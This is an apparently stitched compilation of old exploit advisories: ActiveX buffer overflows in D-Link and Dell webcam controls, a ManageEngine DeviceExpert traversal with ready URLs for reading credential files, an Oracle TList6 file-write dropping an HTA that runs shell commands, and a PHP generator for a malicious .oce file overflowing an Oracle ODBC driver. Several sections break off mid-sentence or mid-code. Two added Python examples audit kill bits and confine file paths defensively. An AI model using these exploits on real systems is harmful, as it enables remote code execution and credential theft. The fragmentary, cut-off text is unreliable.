100712EB  33C4             xor eax,esp
100712ED  898424 3004      mov dword ptr ss:[esp+430],eax
100712F4  53               push ebx
100712F5  8B9C24 4804      mov ebx,dword ptr ss:[esp+448]
100712FC  55               push ebp
100712FD  8BAC24 4004      mov ebp,dword ptr ss:[esp+440]
10071304  56               push esi
10071305  8BB424 4C04      mov esi,dword ptr ss:[esp+44C]
1007130C  57               push edi
1007130D  8BBC24 4C04      mov edi,dword ptr ss:[esp+44C]
10071314  68 0802          push 208
10071319  8D4424 34        lea eax,dword ptr ss:[esp+34]
1007131D  6A 00            push 0
1007131F  50               push eax
10071320  E8 0BC40300      call DcsCliCt.100AD730
10071325  83C4 0C          add esp,0C
10071328  85F6             test esi,esi
1007132A  74 0C            je short DcsCliCt.10071338
1007132C  56               push esi
1007132D  8D4C24 34        lea ecx,dword ptr ss:[esp+34]
10071331  51               push ecx
10071332  FF15 D4D20C10    call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW
..

An attacker could entice a remote user to browse a web page to gain control of the victim browser, by passing an overlong string to the mentioned method and overwriting critical structures (SEH).

As attachment, proof of concept code.

Note, to reproduce the wanted crash: when the SelectDirectory() method is called, the user is asked to select a destination folder for the stream recorder. To set EIP to 0x0c0c0c0c select a folder of choice, then proceed. When clicking Cancel you get a non-useful crash; however it could be possible that, by modifying the poc, you will have EIP overwritten as well. I think that it is also possible that other products might carry this dll, I could post an update if I find more.

Additional note:

..
0:029> lm -vm DcsCliCtrl
start    end        module name
0845     0859e000   DcsCliCtrl   (deferred)
    Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
    Image name: DcsCliCtrl.dll
    Timestamp:        Thu Aug 19 08:48:47 2010 (4C6CD3CF)
    CheckSum:         001325EC
    ImageSize:        0014E000
    File version:     1.0.0.4519
    Product version:  1.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        .
    Translations:     0409.04e4
    ProductName:      Camera Streaming Client
    InternalName:     DcsCliCtrl.dll
    OriginalFilename: DcsCliCtrl.dll
    ProductVersion:   1.0.0.1
    FileVersion:      1.0.0.4519
    FileDescription:  Camera Stream Client Control
    LegalCopyright:   Copyright: (c) All rights reserved.
..

original url: http://retrogod.altervista.org/9sg_dlink_adv.htm
poc: http://retrogod.altervista.org/9sg_dlink_poc.htm
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability
Tested against:
  Microsoft Windows Vista SP2
  Microsoft Windows XP SP3
  Microsoft Windows 2003 R2 SP2
  Internet Explorer 7/8/9

download url of a test version: http://search.dell.com/results.aspx?c=us&l=en&s=gen&cat=sup&k=Dell+SX2210+monitor&rpp=12&p=1&subcat=dy&drf=all&nk=f&sort=K&ira=False&~srd=False&ipsys=False&advsrch=False&~ck=anav
file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe

This package contains the Dell Webcam Central software developed by Creative Technologies for Dell.

info:
  http://dell-webcam-central.software.informer.com/
  http://live-cam-avatar-creator.software.informer.com/
  http://www.google.com/search?channel=s&hl=en&biw=1024&bih=581&q=13149882-F480-4F6B-8C6A-0764F75B99ED
  http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=crazytalk4.ocx&btnG=Search
  http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=CrazyTalk4Native.dll&btnG=Search
  http://dell-webcam-central.software.informer.com/users/
  http://live-cam-avatar-creator.software.informer.com/users/

I think this is a very common ActiveX, probably bundled with Dell Notebooks.

Background:
The mentioned software carries a third party ActiveX Control with the following settings:
  Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
  ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
  CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
  Safe for Scripting (Registry): True
  Safe for Initialization (Registry): True

This control is marked safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote.

Vulnerability:
The 'BackImage', 'ScriptName', 'ModelName' and 'SRC' properties can be used to trigger a buffer overflow condition. The crazytalk4.ocx ActiveX control loads the CrazyTalk4Native.dll library and, while constructing a local file path, calls sprintf() into a buffer of insufficient size.

..
Call stack of main thread
Address   Stack     Procedure / arguments                          Called from          Frame
0012EE24  023D4FAB  msvcrt.sprintf                                 CrazyTal.023D4FA5    0012EE28
0012EE28  0012F180  s = 0012F180
0012EE2C  023F431C  format = "%s%s%s"
0012EE30  042A2D6C  <%s> = "C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\"
0012EE34  0012EF5C  <%s> = "aa"
0012EE38  0012EE58  <%s> =
0012F164  023D601D  CrazyTal.023D4F20
..

code, CrazyTalk4Native.dll:

..
023D4F80  85C0             test eax,eax
023D4F82  74 38            je short CrazyTal.023D4FBC
023D4F84  8B9C24 2C03      mov ebx,dword ptr ss:[esp+32C]
023D4F8B  8D4424 1C        lea eax,dword ptr ss:[esp+1C]
023D4F8F  8D8C24 2001      lea ecx,dword ptr ss:[esp+120]
023D4F96  50               push eax
023D4F97  81C6 443B        add esi,3B44
023D4F9D  51               push ecx
023D4F9E  56               push esi
023D4F9F  68 1C433F02      push CrazyTal.023F431C                  ; ASCII "%s%s%s"
023D4FA4  53               push ebx
023D4FA5  FF15 E4F33E02    call dword ptr ds:[<&MSVCRT.sprintf>]   ; msvcrt.sprintf
..

As attachment, proof of concept code which overwrites EIP and SEH.

Note:

..
0:008> lm -vm CrazyTalk4Native
start    end        module name
021c     0220b000   CrazyTalk4Native   (deferred)
    Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll
    Image name: CrazyTalk4Native.dll
    Timestamp:        Thu May 17 12:13:42 2007 (464C2AD6)
    CheckSum:         00048AB2
    ImageSize:        0004B000
    File version:     4.5.815.1
    Product version:  4.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        .
    Translations:     0409.04b0
    CompanyName:      C3D
    ProductName:      CrazyTalk4 ActiveX Control Module
    InternalName:     CrazyTalk4
    OriginalFilename: CrazyTalk4.OCX
    ProductVersion:   4, 0, 0, 1
    FileVersion:      4, 5, 815, 1
    PrivateBuild:     4, 5, 815, 1
    SpecialBuild:     4, 5, 815, 1
    FileDescription:  CrazyTalk4 Native Control Module
    LegalCopyright:   Copyright (C) 2005
    LegalTrademarks:  Copyright (C) 2005
    Comments:         Copyright (C) 2005
..

proof of concept: http://retrogod.altervista.org/9sg_dell_poc_nodep.html
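Every ActiveX advisory on this page (EasyMail, TeeChart, MVT, UltraMJCam, AnnotateX, DcsCliCtrl and CrazyTalk4) turns on the same fact: the control is marked safe for scripting, so Internet Explorer will instantiate it from a remote page. Until a vendor fix lands, the standard mitigation is Microsoft's kill bit (KB240797): a "Compatibility Flags" DWORD with bit 0x400 set under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, and on 64-bit Windows also under the Wow6432Node view that 32-bit IE reads. The following Python is an added example, not from the advisories or the vendors: it audits a .reg export of those keys against the CLSIDs listed on this page and reports which controls are actually blocked in every required view. The export text is constructed for the example; a real one comes from `reg export` and is UTF-16, so decode it before parsing.

```python
import re

KILL_BIT = 0x400  # "Compatibility Flags" bit that stops Internet Explorer from loading a control

# Registry views to audit: the native view, plus the Wow6432Node view used by 32-bit IE on x64
COMPAT_KEYS = {
    "native": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    "wow64": r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
}

# CLSIDs of the controls covered by the advisories on this page (upper-cased for comparison)
PAGE_CLSIDS = {
    "{4610E7BF-710F-11D3-813D-00C04F6B92D0}": "EasyMail.SMTP.5 (Borland Caliber)",
    "{008BBE7E-C096-11D0-B4E3-00A0C901D681}": "TeeChart.TChart (Borland Silk Central)",
    "{2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}": "MVT.MVTControl.6300 (McAfee Virtual Technician)",
    "{707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11}": "UltraMJCam.UltraMJCam.1 (TRENDnet SecurView)",
    "{EF600D71-358F-11D1-8FD4-00AA00BD091C}": "AnnotationX.AnnList.1 (Quest InTrust)",
    "{721700FE-7F0E-49C5-BDED-CA92B7CB1245}": "DcsCliCtrl.DCSStrmControl.1 (D-Link DCS-5605)",
    "{13149882-F480-4F6B-8C6A-0764F75B99ED}": "CRAZYTALK4.CrazyTalk4Ctrl.1 (Dell Webcam Software)",
}

SECTION_RE = re.compile(r"^\[(.+)\]$")
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9a-fA-F]{1,8})$', re.IGNORECASE)


def parse_compat_flags(reg_text):
    """Map (view, CLSID) -> Compatibility Flags value from a .reg export of the keys above."""
    flags = {}
    current = None  # (view, CLSID) of the section being read, or None if it is some other key
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = None
            key = m.group(1)
            for view, base in COMPAT_KEYS.items():
                if key.lower().startswith(base.lower() + "\\"):
                    current = (view, key[len(base) + 1:].upper())
            continue
        m = FLAGS_RE.match(line)
        if m and current:
            flags[current] = int(m.group(1), 16)
    return flags


def audit_kill_bits(reg_text, clsids=PAGE_CLSIDS, views=("native", "wow64")):
    """Per CLSID, True only when every required view carries the kill bit.

    A control present in just one view is reported as unprotected, because the IE
    bitness that reads the other view would still load it. On 32-bit Windows pass
    views=("native",).
    """
    flags = parse_compat_flags(reg_text)
    return {
        clsid: all(flags.get((view, clsid), 0) & KILL_BIT for view in views)
        for clsid in clsids
    }


# Constructed export: McAfee MVT blocked in both views, UltraMJCam only in the native view,
# DcsCliCtrl present but with the flag cleared, the other four controls absent entirely.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{707abfc2-1d27-4a10-a6e4-6be6bdf9fb11}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{721700FE-7F0E-49C5-BDED-CA92B7CB1245}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{721700FE-7F0E-49C5-BDED-CA92B7CB1245}]
"Compatibility Flags"=dword:00000000
"""

if __name__ == "__main__":
    for clsid, blocked in audit_kill_bits(SAMPLE_REG_EXPORT).items():
        print(("blocked   " if blocked else "UNBLOCKED "), clsid, PAGE_CLSIDS[clsid])
```

The audit deliberately treats "key absent" and "flag cleared" the same way, and requires both views by default: a kill bit written only to the native view leaves 32-bit IE on a 64-bit host fully exposed, which is the common mistake when the value is set by hand.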
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability

product homepage: http://www.manageengine.com/products/device-expert/
file tested: ManageEngine_DeviceExpert.exe
tested against: Microsoft Windows Server 2003 r2 sp2

Description: DeviceExpert is a webbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. [..]

Background:
The mentioned product installs a Java application server which listens by default on port 6060 (https) for incoming connections.

Vulnerability:
Without prior authentication, it is possible to invoke the ScheduleResultViewer servlet to disclose any file on the target system. This is done through the FileName argument, which suffers from a directory traversal vulnerability.

examples:
https://[host]:6060/scheduleresult.de/?FileName=conf\Authentication\auth-conf.xml
https://[host]:6060/scheduleresult.de/?FileName=..\..\..\..\..\..\..\..\..\..\boot.ini

auth-conf.xml stores the authentication credentials to the administrative interface (username, hashed password and a salt). It is also possible to back up the MySQL database tables by cycling through subfolders. These tables can also contain usernames and passwords of the configured devices; remember what the software does: it manages devices from multiple vendors, from the following list:

..
Cisco, HP, Nortel, Juniper, Force10, 3Com, D-link, Foundry, Dell, Aruba, Extreme, ADTRAN, Enterasys, Huawei, Blue Coat, Proxim, NetScreen, NETGEAR, FortiNet, ALAXALA, Brocade, Radware, DAX, H3C, Yamaha, Vanguard, Allied Telesis, Alcatel, Fujitsu, Motorola, Acme Packet, Watch Guard, Canoga Perkins
..

Explanation: look at the web.xml located inside C:\ManageEngine\DeviceExpert\webapps\ncm\WEB-INF\ :

..
<servlet>
  <servlet-name>ScheduleResultViewer</servlet-name>
  <servlet-class>com.adventnet.ncm.client.schedule.ScheduleResultViewerServlet</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>ScheduleResultViewer</servlet-name>
  <url-pattern>/scheduleresult.de/*</url-pattern>
</servlet-mapping>
..

now decompile ScheduleResultViewerServlet.class:

..
package com.adventnet.ncm.client.schedule;

import com.adventnet.ncm.util.NCMServerUtil;
import java.io.*;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.servlet.ServletException;
import javax.servlet.http.*;

public class ScheduleResultViewerServlet extends HttpServlet
{
    public ScheduleResultViewerServlet()
    {
        logger = Logger.getLogger(ScheduleResultViewerServlet.class.getName());
    }

    public void service(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException
    {
        FileInputStream in;
        OutputStream out;
        in = null;
        out = null;
        try
        {
            String fileName = request.getParameter("FileName"); //<--
            if(fileName.endsWith(".pdf"))
            {
                response.reset();
                response.setContentType("application/pdf;charset=utf-8");
            } else
            {
                response.setContentType("text/html;charset=utf-8");
            }
            File file = new File((new StringBuilder()).append(NCMServerUtil.SERVER_HOME).append(FS).append(fileName).toString()); //<---
            response.setContentLength((int)file.length());
            in = new FileInputStream(file);
            out = response.getOutputStream(); //<-
            byte buf[] = new byte[1024];
            for(int count = 0; (count = in.read(buf)) >= 0;)
                out.write(buf, 0, count); //<-
        }
        catch(Exception ex)
        {
            logger.log(Level.SEVERE, "Exception while processing request in ScheduleResultViewerServlet", ex);
            throw new ServletException(ex);
        }
        if(in != null)
            in.close();
        if(out != null)
            out.close();
        break MISSING_BLOCK_LABEL_221;
        Exception exception;
        exception;
        if(in != null)
            in.close();
        if(out != null)
            out.close();
        throw exception;
    }

    Logger logger;
    private static final String FS = System.getProperty("file.separator");
}
..

'FileName' is taken from the request parameter without sanitization and passed straight to the File object; the file content is then sent back to the remote user. I think this is a huge vulnerability because it could open the path to the equipment of an entire network.

As attachment, proof of concept code which backs up the underlying MySQL database. You could also choose
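The fix for this class of bug is to confine the requested name to one directory before the filesystem is touched. The Python below is an added example, not ManageEngine's code: SERVER_HOME stands in for NCMServerUtil.SERVER_HOME and the "scheduleresults" subdirectory is an assumed name for the tree the viewer actually needs to serve. It runs the two FileName values from the advisory through the check; in the servlet the same logic would be File.getCanonicalPath() on base and candidate followed by a startsWith() test.

```python
import posixpath
from typing import Optional

# Constructed stand-ins for the servlet's inputs: the server root that
# NCMServerUtil.SERVER_HOME supplies, and the one subtree the viewer
# legitimately reads from (the subdirectory name is an assumption).
SERVER_HOME = "/opt/ManageEngine/DeviceExpert"
RESULTS_SUBDIR = "scheduleresults"


def normalise_request_path(file_name: str) -> str:
    """Unify separators and resolve '.' and '..' lexically.

    The target runs on Windows, where the JVM accepts both '\\' and '/', so a
    check that understands only one of them is bypassed with the other.
    posixpath.normpath keeps leading '..' components, which is exactly what
    lets resolve_under() detect an escape.
    """
    return posixpath.normpath(file_name.replace("\\", "/"))


def is_absolute_or_drive(p: str) -> bool:
    """Reject rooted paths (/etc/passwd) and drive-letter paths (C:\\boot.ini)."""
    return p.startswith("/") or (len(p) >= 2 and p[1] == ":")


def resolve_under(base: str, file_name: str) -> Optional[str]:
    """Return the full path if file_name stays inside base, else None."""
    if not file_name or "\x00" in file_name:
        return None
    rel = normalise_request_path(file_name)
    if rel == "." or is_absolute_or_drive(rel):
        return None
    if rel == ".." or rel.startswith("../"):
        return None
    full = posixpath.normpath(posixpath.join(base, rel))
    # Compare against base plus a separator so that "/opt/x" does not pass
    # for a base of "/opt/x-other".
    if not full.startswith(base.rstrip("/") + "/"):
        return None
    return full


def serve_path(file_name: str) -> Optional[str]:
    """What the servlet should do: confine FileName to the results tree only."""
    rel = normalise_request_path(file_name)
    if not rel.startswith(RESULTS_SUBDIR + "/"):
        return None
    return resolve_under(SERVER_HOME, rel)


if __name__ == "__main__":
    for candidate in ("conf\\Authentication\\auth-conf.xml",
                      "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini",
                      "scheduleresults/report-1.html"):
        print(f"{candidate!r:60} -> {serve_path(candidate)}")
```

Lexical normalisation does not follow symbolic links, so on a real server both base and candidate should be canonicalised (realpath or getCanonicalPath) before the prefix comparison; and independently of the path check, the servlet should require an authenticated session.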
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability

tested against:
Internet Explorer 8
Microsoft Windows Server 2003 r2 sp2

download url: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
HyperionFinancialManagement-11121.zip

Background:
the mentioned program installs an ActiveX control with the following settings:

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

This control is marked safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control.

Vulnerability:
The mentioned class contains the vulnerable SaveData() method, see typelib:

..
/* DISPID=167 */
/* VT_I2 [2] */
function SaveData(
  /* VT_BSTR [8] */ $lpszFileName
)
{
}
..

which allows creating or overwriting files with arbitrary extensions in arbitrary locations, e.g. the automatic startup folders. By manipulating e.g. the Caption property it is possible to create a valid application with the .hta extension. The resulting file will look like this:

0000 00 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 .be;Ô. ¢..à).
0010 09 00 06 00 ac 14 00 00 ac 14 00 00 e4 00 00 00 ¬... ¬...ä...
0020 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 ..Rã.Î .ã.ª.K¸
0030 51 01 00 00 00 90 01 c0 d4 01 00 0f 54 69 6d 65 Q.À Ô...Time
0040 73 20 4e 65 77 20 52 6f 6d 61 6e 01 00 01 01 00 s New Ro man.
0050 08 00 00 80 05 00 00 80 0e 00 00 80 0d 00 00 80 ...... ......
0060 2c 01 00 00 e1 00 00 00 e1 00 00 00 f1 ff ff ff ,...á... á...ñÿÿÿ
0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0080 00 00 00 00 00 00 00 00 01 5c 61 3e 3e 3e 3e 3e .\a
0090 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3c 53 43 52 SCR
00a0 49 50 54 3e 20 76 61 72 20 78 3d 6e 65 77 20 41 IPT var x=new A
00b0 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 ctiveXOb ject(WS
00c0 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 20 78 cript.Sh ell); x
00d0 2e 45 78 65 63 28 22 43 41 4c 43 2e 45 58 45 22 .Exec(C ALC.EXE
00e0 29 3b 20 3c 2f 53 43 52 49 50 54 3e 00 01 01 01 ); /SCR IPT
00f0 03 00 ff ff ff ff ff ff ff ff 00 01 00 01 00 00 ..ÿÿ ÿÿ..
0100 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00
0110 01 00 00 00 00 00 03 00 01 00 00 00 ff 00 00 00 ÿ...
0120 00 00 00 08 00 00 80 01 00 00 00 00 00 00 00 00 ...
0130 00 17 00 00 80 18 00 00 80 00 00 00 00 01 00 1a ... ...
0140 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 44 be;Ô.¢ ..à).D
0150 55 02 00 00 00 12 00 06 00 0b 00 02 00 00 00 00 U...
0160 00 00 04 00 03 00 00 60 ab 4e 06 10 00 00 00 5f ...` «N._
0170 5f 4f 62 73 6f 6c 65 74 65 56 61 6c 75 65 00 00 _Obsolet eValue..
0180 00 00 00 00 00 00 00 00 60 ab 4e 06 00 00 00 00 `«N.
0190 01 4d 4b 10 00 00 00 00 00 01 00 00 00 02 00 00 .MK.
01a0 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00
01b0 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00
01c0 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00
01d0 00 0f 00 00 00 00 00 ff 00 00 ff ff ff 00 00 00 ...ÿ ..ÿÿÿ...
01e0 ff 00 00 00 00 00 00 05 00 00 00 02 00 00 00 00 ÿ...
01f0 00 01 00 00 c0 c0 c0 22 00 00 08 00 00 00 09 00 ÀÀÀ
0200 01 00 00 80 bf ff 31 00 00 00 8a e3 aa 2b 84 ee ...¿ÿ1. ..ãª+î
0210 e5 a0 2b 84 a8 ac a0 0c 00 00 00 35 35 32 58 58 å +¨¬ . ...552XX
0220 58 58 58 44 45 4d 4f 08 00 00 00 4a 6f 68 6e 20 XXXDEMO. ...John
0230 44 6f 65 1e 00 01 00 00 00 00 40 00 00 ff ff ff Doe. ..@..ÿÿÿ
0240 00 90 01 00 00 02 00 d7 00 00 00 44 55 06 00 00 ..× ...DU...
0250 00 12 00 06 00 0b 00 06 00 00 00 f8 8f 50 04 10 ...øP..
0260 00 00 00 5f 5f 49 6e 6e 65 72 50 69 63 41 6c 69 ...__Inn erPicAli
0270 67 6e 00 03 00 05 00 00 00 00 10 58 66 04 13 00 gn.. ...Xf...
0280 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 72 43 ..__Inne rBorderC
0290 6f 6c 6f 72 00 03 00 00 00 00 00 00 20 b5 56 08 olor µV.
02a0 13 00 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 __In nerBorde
02b0 72 53 74 79 6c 65 00 03 00 00 00 00 00 00 30 f4 rStyle.. ..0ô
02c0 60 08 11 00 00 00 5f 5f 49 6e 6e 65 72 42 61 63 `.__ InnerBac
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
<?php
/*
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
by rgod

found a local vector for this:
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/

This poc will create a suntzu.oce file which should work against Hyperion
Interactive Reporting Studio, which is delivered with the Oracle Hyperion Suite.
When clicked, a login box appears; on clicking OK an error message appears,
then another error, then... boom!

description for .oce : Interactive Reporting database connection file
file association: "C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"

crash dump, eip and seh overwritten, unicode expanded, I suppose one should be
able to deal with it:

(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=00000f49 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:0f48= 0
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/

function _x($x){
  global $buff;
  list($x) = array_values(unpack('V', $x));
  $x = $x + strlen($buff);
  $x = pack('V',$x);
  return $x;
}

$buff = "mydatabase.com".
        str_repeat("\x20",16). //cosmetics, no "..." inside the login box
        str_repeat("\x41",4000);

//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=X;";

while (!(strlen($dsn)==166)){ //fill the gap
  $dsn.="\x20";
}

$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);

$dump= "#BRIF\x20BIN001".
"\x00\x00\x00\x00".
_x("\x7b\x07\x00\x00"). //header length, increase counter
"\x37\x00\x00\x00". //path length
"D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce".
"\x01\x00\x01\x00".
"\x00\x00\x07\x00".
"\x00\x00\x0a\x00".
"\x00\x00".
_x("\xa6\x00\x00\x00"). //dsn length
$dsn.
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x04\x00\x00\x00".
"True".
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00".
"ColItem.Table".
"\x01\x00".
"\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00".
"ColItem.TableAlias".
"\x01\x00\x00\x00\x10\x00".
"\x00\x00\r\x00\x00\x00".
"ColItem.Owner".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00".
"\x00".
"ColItem.Type".
"\x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00".
"Source".
"\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00".
"Where".
"\x01".
"\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00".
"OrderBy".
"\x01\x00".
"\x00\x00\x05\x00\x00\x00\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00".
"\x04\x00\x00\x00\x10\x00\x00\x00".
"ColItem.ColAlias".
"\x01\x00\x00\x00\x10\x00\x00\x00".
"\x0e\x00\x00\x00".
"ColItem.ColNum".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00".
"ColItem.ColType".
"\x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00".
"ColItem.NumBytes".
"\x01\x00\x00\x004\x00".
"\x00\x00\x0e\x00\x00\x00".
"ColItem.Places".
"\x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00".
"\x00".
"ColItem.Digits".
"\x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00".
"ColItem.Nulls".
"\x01\x00\x00\x00X\x00".
"\x00\x00\x12\x00\x00\x00".
"ColItem.NativeType".
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability

tested against:
Microsoft Windows 2k3 r2 sp2
